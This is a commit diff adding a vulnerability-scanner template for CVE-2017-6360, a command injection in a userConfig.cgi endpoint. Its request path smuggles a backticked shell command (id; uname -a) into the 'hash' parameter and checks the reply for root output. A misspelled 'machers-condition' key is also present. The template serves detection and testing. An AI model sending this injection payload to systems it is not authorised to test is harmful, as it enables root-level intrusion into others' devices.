commit
ee41cc2b3d
|
@ -0,0 +1,22 @@
|
||||||
|
id: CVE-2017-6360
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Command Injection in userConfig.cgi cloudPersonalSmtp 'hash'
|
||||||
|
author: Harsh Bothra
|
||||||
|
severity: Critical
|
||||||
|
|
||||||
|
# source:- https://www.exploit-db.com/exploits/41842
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`'
|
||||||
|
|
||||||
|
machers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "uid=0("
|
Loading…
Reference in New Issue